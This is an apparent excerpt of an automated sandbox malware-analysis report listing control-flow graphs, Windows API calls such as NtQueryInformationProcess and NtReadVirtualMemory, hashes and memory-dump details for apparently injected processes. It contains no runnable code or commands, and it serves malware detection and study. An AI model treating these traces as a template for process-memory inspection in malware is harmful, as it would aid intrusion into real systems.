                                                                                          control_flow_graph 147 6a836d-6a836e 148 6a8370-6a8377 147->148 149 6a83c1-6a83c9 147->149 150 6a83cb-6a83ef call 6ab5b8 149->150 151 6a83f5-6a8420 send 149->151 150->151
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.6024252717.0000000000670000.00000040.80000000.00040000.00000000.sdmp, Offset: 00670000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_670000_RAVCpl64.jbxd
                                                                                          Similarity
                                                                                          • API ID: send
                                                                                          • String ID:
                                                                                          • API String ID: 2809346765-0
                                                                                          • Opcode ID: e77712ea000a5c24f622f0744815b0c0a6fd831ca4d317e9b8f22d952decd8a9
                                                                                          • Instruction ID: d6d7321c0164c5b222f1f325183f03dedb32b1a0a170efd06ed385140833736b
                                                                                          • Opcode Fuzzy Hash: e77712ea000a5c24f622f0744815b0c0a6fd831ca4d317e9b8f22d952decd8a9
                                                                                          • Instruction Fuzzy Hash: 31F0493150CA0C9FCF95EF08D481B9977E5FB98300F04056DD88ECB24ADB30AA459B96

                                                                                          Execution Graph

                                                                                          Execution Coverage:0.4%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:0%
                                                                                          Total number of Nodes:11
                                                                                          Total number of Limit Nodes:1
                                                                                          execution_graph 82050 4a02b20 82052 4a02b2a 82050->82052 82053 4a02b31 82052->82053 82054 4a02b3f LdrInitializeThunk 82052->82054 82063 4a029f0 LdrInitializeThunk 82069 4ceedd8 82070 4ceedfd 82069->82070 82071 4ceef68 NtQueryInformationProcess 82070->82071 82074 4ceefd5 82070->82074 82072 4ceefa2 82071->82072 82073 4cef074 NtReadVirtualMemory 82072->82073 82072->82074 82073->82074

                                                                                          Executed Functions

                                                                                          Function 04CEEDD6 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 539nativeCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 0 4ceedd6-4ceedfb 1 4ceedfd-4ceee14 call 4cf0fe8 0->1 2 4ceee19-4ceee39 call 4cf1008 call 4cece48 0->2 1->2 8 4ceee3f-4ceef3f call 4ceed08 call 4cf1008 call 4cf4f14 call 4ce0398 call 4cf05b8 call 4ce0398 call 4cf05b8 call 4cf2cd8 2->8 9 4cef3eb-4cef3f6 2->9 26 4cef3df-4cef3e6 call 4ceed08 8->26 27 4ceef45-4ceefd3 call 4ce0398 call 4cf05b8 NtQueryInformationProcess call 4cf1008 call 4ce0398 call 4cf05b8 8->27 26->9 39 4ceefe7-4cef05d call 4cf4f22 call 4ce0398 call 4cf05b8 27->39 40 4ceefd5-4ceefe2 27->40 39->40 49 4cef063-4cef072 call 4cf4f4c 39->49 40->26 52 4cef0bf-4cef0ff call 4ce0398 call 4cf05b8 call 4cf3618 49->52 53 4cef074-4cef0ba NtReadVirtualMemory call 4cf1cf8 49->53 62 4cef11e-4cef20e call 4ce0398 call 4cf05b8 call 4cf4f5a call 4ce0398 call 4cf05b8 call 4cf2ff8 call 4cf0fb8 * 3 call 4cf4f4c 52->62 63 4cef101-4cef119 52->63 53->26 86 4cef23b-4cef253 call 4cf4f4c 62->86 87 4cef210-4cef239 call 4cf4f4c call 4cf0fb8 call 4cf4fae call 4cf4f68 62->87 63->26 93 4cef27f-4cef291 call 4cf1c38 86->93 94 4cef255-4cef27a call 4cf27a8 86->94 98 4cef296-4cef2a0 87->98 93->98 94->93 100 4cef35c-4cef3bf call 4ce0398 call 4cf05b8 call 4cf3928 98->100 101 4cef2a6-4cef2f0 call 4ce0398 call 4cf05b8 call 4cf3308 call 4cf4f4c 98->101 100->26 125 4cef3c1-4cef3d6 100->125 120 4cef322-4cef32a call 4cf4f4c 101->120 121 4cef2f2-4cef318 call 4cf4ff8 call 4cf4fae 101->121 120->100 129 4cef32c-4cef337 120->129 121->120 125->26 128 4cef3da call 4cf0fe8 125->128 128->26 129->100 132 4cef339-4cef357 call 4cf3c38 129->132 132->100
                                                                                          APIs
                                                                                          • NtQueryInformationProcess.NTDLL ref: 04CEEF87
                                                                                          • NtReadVirtualMemory.NTDLL ref: 04CEF08F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000D.00000002.5167666035.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_13_2_4ce0000_cttune.jbxd
                                                                                          Similarity
                                                                                          • API ID: InformationMemoryProcessQueryReadVirtual
                                                                                          • String ID: 0$@UWH
                                                                                          • API String ID: 1498878907-4251425181
                                                                                          • Opcode ID: 0eea07b0d32ff9062b8ace6a2e7de79120e21f70f25ead85994ea7a9deddf012
                                                                                          • Instruction ID: 0442ef41efe08f76d40e4b48c192ff3ea0eb922f741aca4454e69db1003c8df7
                                                                                          • Opcode Fuzzy Hash: 0eea07b0d32ff9062b8ace6a2e7de79120e21f70f25ead85994ea7a9deddf012
                                                                                          • Instruction Fuzzy Hash: CC023A74518B8C8FDBA5EF68C894AEE77E2FB99304F40461A994EC7240DF34E641DB41
                                                                                          Function 04CEEDD8 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 197nativeCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 134 4ceedd8-4ceedfb 135 4ceedfd-4ceee14 call 4cf0fe8 134->135 136 4ceee19-4ceee39 call 4cf1008 call 4cece48 134->136 135->136 142 4ceee3f-4ceef3f call 4ceed08 call 4cf1008 call 4cf4f14 call 4ce0398 call 4cf05b8 call 4ce0398 call 4cf05b8 call 4cf2cd8 136->142 143 4cef3eb-4cef3f6 136->143 160 4cef3df-4cef3e6 call 4ceed08 142->160 161 4ceef45-4ceefd3 call 4ce0398 call 4cf05b8 NtQueryInformationProcess call 4cf1008 call 4ce0398 call 4cf05b8 142->161 160->143 173 4ceefe7-4cef05d call 4cf4f22 call 4ce0398 call 4cf05b8 161->173 174 4ceefd5-4ceefe2 161->174 173->174 183 4cef063-4cef072 call 4cf4f4c 173->183 174->160 186 4cef0bf-4cef0ff call 4ce0398 call 4cf05b8 call 4cf3618 183->186 187 4cef074-4cef0b5 NtReadVirtualMemory call 4cf1cf8 183->187 196 4cef11e-4cef20e call 4ce0398 call 4cf05b8 call 4cf4f5a call 4ce0398 call 4cf05b8 call 4cf2ff8 call 4cf0fb8 * 3 call 4cf4f4c 186->196 197 4cef101-4cef119 186->197 190 4cef0ba 187->190 190->160 220 4cef23b-4cef253 call 4cf4f4c 196->220 221 4cef210-4cef239 call 4cf4f4c call 4cf0fb8 call 4cf4fae call 4cf4f68 196->221 197->160 227 4cef27f-4cef291 call 4cf1c38 220->227 228 4cef255-4cef27a call 4cf27a8 220->228 232 4cef296-4cef2a0 221->232 227->232 228->227 234 4cef35c-4cef3bf call 4ce0398 call 4cf05b8 call 4cf3928 232->234 235 4cef2a6-4cef2f0 call 4ce0398 call 4cf05b8 call 4cf3308 call 4cf4f4c 232->235 234->160 259 4cef3c1-4cef3d6 234->259 254 4cef322-4cef32a call 4cf4f4c 235->254 255 4cef2f2-4cef318 call 4cf4ff8 call 4cf4fae 235->255 254->234 263 4cef32c-4cef337 254->263 255->254 259->160 262 4cef3da call 4cf0fe8 259->262 262->160 263->234 266 4cef339-4cef357 call 4cf3c38 263->266 266->234
                                                                                          APIs
                                                                                          • NtQueryInformationProcess.NTDLL ref: 04CEEF87
                                                                                          • NtReadVirtualMemory.NTDLL ref: 04CEF08F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000D.00000002.5167666035.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_13_2_4ce0000_cttune.jbxd
                                                                                          Similarity
                                                                                          • API ID: InformationMemoryProcessQueryReadVirtual
                                                                                          • String ID: 0
                                                                                          • API String ID: 1498878907-4108050209
                                                                                          • Opcode ID: 3f9df0a1b4d14e409c7ec5a0468e99b61ae58681ccec402e4e790ce1b315d1b4
                                                                                          • Instruction ID: b3529842b32dc600d35d17be720e105cbd517d8eaa37f8894041d4dd14de63c7
                                                                                          • Opcode Fuzzy Hash: 3f9df0a1b4d14e409c7ec5a0468e99b61ae58681ccec402e4e790ce1b315d1b4
                                                                                          • Instruction Fuzzy Hash: 44519370918A8C8FDBA5EF69C8946EE7BE1FB94305F40462ED44EC7250DF349245DB41
                                                                                          Function 04A02CF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 282 4a02cf0-4a02cfc LdrInitializeThunk
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000D.00000002.5166777950.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004AB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004ABD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_13_2_4990000_cttune.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 877e27d757b41a61968ceebd9610cb23ef71f01b4d15aba039cbae3360caf520
                                                                                          • Instruction ID: d6efd5e49480c0e69e32295da95a28f4f76ffd497ff7641bc3a6aba621331ede
                                                                                          • Opcode Fuzzy Hash: 877e27d757b41a61968ceebd9610cb23ef71f01b4d15aba039cbae3360caf520
                                                                                          • Instruction Fuzzy Hash: 50900221242041527945B558450450750069BE02C5791C41AA1405951CC53AE857E621
                                                                                          Function 04A02C30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 281 4a02c30-4a02c3c LdrInitializeThunk
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000D.00000002.5166777950.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004AB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004ABD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_13_2_4990000_cttune.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 654a580c29c37322f7895c63bf63a625645e05b8014502caed669bd85ca85f3a
                                                                                          • Instruction ID: 36f470c079862fc991831ea6aa5dda21cb62fe6edf3ae5fccddcf4f64e3df1c0
                                                                                          • Opcode Fuzzy Hash: 654a580c29c37322f7895c63bf63a625645e05b8014502caed669bd85ca85f3a
                                                                                          • Instruction Fuzzy Hash: 0790022921300002F5807558550860A10058BD1286F91D81DA0006559CC929D86A6321
                                                                                          Function 04A02D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 283 4a02d10-4a02d1c LdrInitializeThunk
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000D.00000002.5166777950.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004AB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004ABD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_13_2_4990000_cttune.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 7ff804c40f9cffdcac41a0e8f6f2b8fb0329d873052025bdf7825b5eeee04095
                                                                                          • Instruction ID: bffb5fb82519a4bad47100673ca6e8082e567106e77104cd09f26bed7bbff768
                                                                                          • Opcode Fuzzy Hash: 7ff804c40f9cffdcac41a0e8f6f2b8fb0329d873052025bdf7825b5eeee04095
                                                                                          • Instruction Fuzzy Hash: 2E90023120100413F5117558460470710098BD02C5F91C81AA0415559DD66AD953B121
                                                                                          Function 04A02E50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000D.00000002.5166777950.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004AB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004ABD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_13_2_4990000_cttune.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: ff3b722eda6d4d4d4a5d084262905ef253125694c31f7d51932b4df038cba3ed
                                                                                          • Instruction ID: 790a4d886b478c05522978c58bef1e53977346c4f8dee7fc584c824ba5a7c0da
                                                                                          • Opcode Fuzzy Hash: ff3b722eda6d4d4d4a5d084262905ef253125694c31f7d51932b4df038cba3ed
                                                                                          • Instruction Fuzzy Hash: 0490026134100442F50075584514B061005CBE1385F51C41DE1055555DC62DDC537126
                                                                                          Function 04A02F00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000D.00000002.5166777950.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004AB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004ABD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_13_2_4990000_cttune.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 638f83559ec574be167841c0ac3ad55ad0244f21de386a6d51266af30f099310
                                                                                          • Instruction ID: df4b9fcc3f22bc310929ac64785bafeac92397487cba312b53cd8c1cb4780892
                                                                                          • Opcode Fuzzy Hash: 638f83559ec574be167841c0ac3ad55ad0244f21de386a6d51266af30f099310
                                                                                          • Instruction Fuzzy Hash: 2B90022121180042F60079684D14B0710058BD0387F51C51DA0145555CC929D8626521
                                                                                          Function 04A029F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 272 4a029f0-4a029fc LdrInitializeThunk
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000D.00000002.5166777950.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004AB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004ABD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_13_2_4990000_cttune.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: d8189850cef1d946e7ac7d706d2994444d62666c7a9dd61b62a80b9d8a8a207a
                                                                                          • Instruction ID: 39b3a4a07d00ed97d8b6f19c7d792f3305f9d063c7ebda4644a6a54b0faaa744
                                                                                          • Opcode Fuzzy Hash: d8189850cef1d946e7ac7d706d2994444d62666c7a9dd61b62a80b9d8a8a207a
                                                                                          • Instruction Fuzzy Hash: 64900225211000032505B958070450710468BD53D5351C429F1006551CD635D8626121
                                                                                          Function 04A02A80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 274 4a02a80-4a02a8c LdrInitializeThunk
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000D.00000002.5166777950.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004AB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004ABD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_13_2_4990000_cttune.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 7565265b52a1204c492becd2107b1f5e38f5f3b1fd3a64b0f69cd1c8b042bf53
                                                                                          • Instruction ID: 9c0313a23f6ab9841d5c2e86d59fa8b1390f8bbd24988b0e9acf0d59f898a313
                                                                                          • Opcode Fuzzy Hash: 7565265b52a1204c492becd2107b1f5e38f5f3b1fd3a64b0f69cd1c8b042bf53
                                                                                          • Instruction Fuzzy Hash: 4990026120200003650575584514616500A8BE0285B51C429E1005591DC539D8927125
                                                                                          Function 04A02AC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 275 4a02ac0-4a02acc LdrInitializeThunk
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000D.00000002.5166777950.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004AB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004ABD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_13_2_4990000_cttune.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 2341ec47146f10176bb87150c0db6075e7d42b35467c009f96333eed5ec62113
                                                                                          • Instruction ID: 534ee257a59452830f2969c06d61385eb63d967eb7ebe2b609e438d0e6fc4362
                                                                                          • Opcode Fuzzy Hash: 2341ec47146f10176bb87150c0db6075e7d42b35467c009f96333eed5ec62113
                                                                                          • Instruction Fuzzy Hash: 8790023160500802F5507558451474610058BD0385F51C419A0015655DC769DA5676A1
                                                                                          Function 04A02A10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 273 4a02a10-4a02a1c LdrInitializeThunk
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000D.00000002.5166777950.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004AB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004ABD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_13_2_4990000_cttune.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: db077174a9ea77324afbde53436b3c2c57e8b35ec878890b9afa1eb5b6b2b216
                                                                                          • Instruction ID: 4a450d6cc304446b33dbc4b8f64e14ef78ee975fc41acdd2ba72eda9a405d55f
                                                                                          • Opcode Fuzzy Hash: db077174a9ea77324afbde53436b3c2c57e8b35ec878890b9afa1eb5b6b2b216
                                                                                          • Instruction Fuzzy Hash: 40900225221000022545B958070450B14459BD63D5391C41DF1407591CC635D8666321
                                                                                          Function 04A02B80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 278 4a02b80-4a02b8c LdrInitializeThunk
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000D.00000002.5166777950.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004AB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004ABD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_13_2_4990000_cttune.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 05fef640381e158cbdaee1d8103f119e83b674c6670df98255443200ac3269f5
                                                                                          • Instruction ID: b37d3d6ca229dc174c9dc961241e8a2be44787bb846873fe0cc1f4e0c48f1415
                                                                                          • Opcode Fuzzy Hash: 05fef640381e158cbdaee1d8103f119e83b674c6670df98255443200ac3269f5
                                                                                          • Instruction Fuzzy Hash: BF90023120100842F50075584504B4610058BE0385F51C41EA0115655DC629D8527521
                                                                                          Function 04A02B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 279 4a02b90-4a02b9c LdrInitializeThunk
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000D.00000002.5166777950.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004AB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004ABD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_13_2_4990000_cttune.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: f9a09b5f433b52cebbaaf4b26b2eca6a1cd0f7c62f3692ec407dea9dd3ae10e8
                                                                                          • Instruction ID: 6c760d169e10552077e15057d551ce3c4481098d88c26055731e490b5d574805
                                                                                          • Opcode Fuzzy Hash: f9a09b5f433b52cebbaaf4b26b2eca6a1cd0f7c62f3692ec407dea9dd3ae10e8
                                                                                          • Instruction Fuzzy Hash: B190023120108802F5107558850474A10058BD0385F55C819A4415659DC6A9D8927121
                                                                                          Function 04A02BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 280 4a02bc0-4a02bcc LdrInitializeThunk
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000D.00000002.5166777950.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004AB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004ABD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_13_2_4990000_cttune.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 75156cdf544289457202eff44f3909957b74ce66d65079aa70719985e9a48152
                                                                                          • Instruction ID: a88c46dd2d16235153be67cd48009e740d3f1839a0be7a461bc54ed983700d0a
                                                                                          • Opcode Fuzzy Hash: 75156cdf544289457202eff44f3909957b74ce66d65079aa70719985e9a48152
                                                                                          • Instruction Fuzzy Hash: 8690023120100402F5007998550864610058BE0385F51D419A5015556EC679D8927131
                                                                                          Function 04A02B00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 276 4a02b00-4a02b0c LdrInitializeThunk
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000D.00000002.5166777950.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004AB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004ABD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_13_2_4990000_cttune.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: c72bbd3fe160b751cb852a732827894bf999157825a88750eca51900b104daaa
                                                                                          • Instruction ID: bd12f227db0c147f9a0b36e0247714b382d78fc0ee733dd7fa3f53016036dd73
                                                                                          • Opcode Fuzzy Hash: c72bbd3fe160b751cb852a732827894bf999157825a88750eca51900b104daaa
                                                                                          • Instruction Fuzzy Hash: C790023120504842F54075584504A4610158BD0389F51C419A0055695DD639DD56B661
                                                                                          Function 04A02B10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 277 4a02b10-4a02b1c LdrInitializeThunk
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000D.00000002.5166777950.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004AB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004ABD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_13_2_4990000_cttune.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 1ed716776c32b196f7a2b5db776f7596f2f815e381706a0e122023517d4094ef
                                                                                          • Instruction ID: b066a2c4fff941c9a55d0ceff6e13d79a2407564f0fcd3e68a4bd99113db2eed
                                                                                          • Opcode Fuzzy Hash: 1ed716776c32b196f7a2b5db776f7596f2f815e381706a0e122023517d4094ef
                                                                                          • Instruction Fuzzy Hash: E890023120100802F5807558450464A10058BD1385F91C41DA0016655DCA29DA5A77A1
                                                                                          Function 04A034E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000D.00000002.5166777950.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004AB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004ABD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_13_2_4990000_cttune.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: c271f465bfee9bbd5a8ce592499243568757e6be8178752f2e54e08e619c18bb
                                                                                          • Instruction ID: bd03235308325133e692ec5326d24ba46be71afb44a4abb5262f36b9d37f376b
                                                                                          • Opcode Fuzzy Hash: c271f465bfee9bbd5a8ce592499243568757e6be8178752f2e54e08e619c18bb
                                                                                          • Instruction Fuzzy Hash: AC90023160510402F5007558461470620058BD0285F61C819A0415569DC7A9D95275A2
                                                                                          Function 04A02B2A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 268 4a02b2a-4a02b2f 269 4a02b31-4a02b38 268->269 270 4a02b3f-4a02b46 LdrInitializeThunk 268->270
                                                                                          APIs
                                                                                          Memory Dump Source
